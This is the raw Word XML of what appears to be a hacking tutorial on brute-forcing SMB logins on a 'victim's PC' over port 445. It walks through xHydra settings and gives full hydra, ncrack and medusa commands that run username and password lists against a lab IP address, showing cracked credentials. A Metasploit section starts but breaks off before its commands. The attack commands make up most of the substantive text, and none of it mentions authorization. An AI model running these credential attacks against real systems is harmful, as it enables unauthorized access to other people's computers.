    <w:p w14:paraId="707FAB7B"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In this article, we will learn how to gain control over our victim’s PC through SMB Port. There are various ways to do it and let take time and learn all those because different circumstances call for a different measure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE2900E" w14:textId="77777777" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">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Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABD6B63" w14:textId="77777777" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCD8A02" w14:textId="77777777" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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X-Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B344EC8" w14:textId="77777777" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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Medusa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BF499D" w14:textId="77777777" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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Ncrack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5577E8B8" w14:textId="77777777" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>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Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7427CF21" w14:textId="77777777" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">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xHydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36422198"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is the graphical version to apply dictionary attack via SMB port to hack a system. For this method to work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220FA0C2"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Open </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>xHydra</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> in your Kali. And select </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Single Target option </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>and there give the IP of your victim PC. And select </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>smb </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>in the box against </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Protocol option </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>and give the port number</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> 445</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> against the </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>port option</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C96F277" w14:textId="24204478"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532F1E09" wp14:editId="303609BC">
            <wp:extent cx="4486275" cy="5076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86275" cy="5076825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E09DB7"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go to </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Passwords tab </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>and select </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Username List </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>and give the path of your text file, which contains usernames, in the box adjacent to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250F5132"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Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AAAB3A" w14:textId="60AE44F2"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51A02FBC" wp14:editId="10672976">
            <wp:extent cx="4486275" cy="5248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86275" cy="5248275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4977B586"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After doing this, go to the Start tab and click on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Start </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>button on the left.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107BAD46"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the process of dictionary attack will start. Thus, you will attain the </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>username </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> pc21</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>password </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> 123</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> of your victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B316DD" w14:textId="15E6BEE6"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095431CA" wp14:editId="6C5F0F9C">
            <wp:extent cx="4486275" cy="49911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86275" cy="4991100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38812495" w14:textId="77777777" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">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Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D652B30"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is one command method and works efficiently with not much work. This method works in the terminal of kali. Therefore, open the terminal in your kali and type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D36C015" w14:textId="556FFBF5" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">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1440" w:dyaOrig="1440" w14:anchorId="7E06DAD6">
          <v:shape id="_x0000_i1400" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId100" w:name="DefaultOcxName20" w:shapeid="_x0000_i14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873D4D" w:rsidRPr="00873D4D" w14:paraId="298A31FE" w14:textId="77777777" w:rsidTr="00873D4D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7873B1D4"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9690" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="097A07CE"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hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 smb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35ACB40B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D83CA83"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-L –&gt; denotes the path of username list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FCC621"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-P –&gt; is to denote the path of password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13499EDB"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Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. After a few minutes, Hydra crack the credential, as you can observe that we had successfully grabbed the SMB </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> as</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> pc21 </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> password </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> 123</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5FFA40" w14:textId="45C34BC3"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68063661" wp14:editId="1BCA9503">
            <wp:extent cx="5731510" cy="130111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1F100FB1" w14:textId="77777777" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">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Ncrack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4636B3BF"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too is a one command method which also works in the terminal of kali. Go to your terminal and type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9A73F0" w14:textId="20A69621" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">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1440" w:dyaOrig="1440" w14:anchorId="51612425">
          <v:shape id="_x0000_i1399" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId102" w:name="DefaultOcxName110" w:shapeid="_x0000_i13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873D4D" w:rsidRPr="00873D4D" w14:paraId="7F49AB7A" w14:textId="77777777" w:rsidTr="00873D4D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F5E97F4"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10185" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AF83658"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ncrack –U /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 –p 445</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48445B89"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0178661F"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 -U –&gt; denotes the path of username list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F27474"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-P –&gt; denotes password file’s path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6A3AAB"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445 –&gt; is the port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48597DC2"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And so, with little work, we can attain the password and username of our victim’s PC. Hence, all the methods to hack a system through SMB port which is used for file sharing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3A5F8B" w14:textId="6849022D"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16B4716A" wp14:editId="503DA753">
            <wp:extent cx="5731510" cy="12128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1212850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56703468" w14:textId="77777777" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">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Medusa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29975C9D"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Medusa is a speedy, parallel, and modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC8BCEA"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Run the following command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66043A97" w14:textId="52EEF003" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">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1440" w:dyaOrig="1440" w14:anchorId="236FBE69">
          <v:shape id="_x0000_i1398" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId104" w:name="DefaultOcxName24" w:shapeid="_x0000_i13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8850"/>
      </w:tblGrid>
      <w:tr w:rsidR="00873D4D" w:rsidRPr="00873D4D" w14:paraId="24DE7FFB" w14:textId="77777777" w:rsidTr="00873D4D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B48AE0A"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10815" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E4980C9"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medusa -h 192.168.1.118 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M smbnt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06E07550"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Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C012938" w14:textId="2BCB6D5F"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10E87FE3" wp14:editId="770C3EA0">
            <wp:extent cx="5731510" cy="22301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230120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03973B2A" w14:textId="77777777" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC56A6F"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will test a SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F911CA9"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Once the metasploit opens type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D054E4B" w14:textId="4FAED59B" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440" w14:anchorId="427EF4B7">
          <v:shape id="_x0000_i1397" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId106" w:name="DefaultOcxName33" w:shapeid="_x0000_i13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7845"/>
      </w:tblGrid>
      <w:tr w:rsidR="00873D4D" w:rsidRPr="00873D4D" w14:paraId="6EA07708" w14:textId="77777777" w:rsidTr="00873D4D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F99775B"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1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D8484F3"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2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FED1C2B"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3</w:t>
            </w:r>
          </w:p>
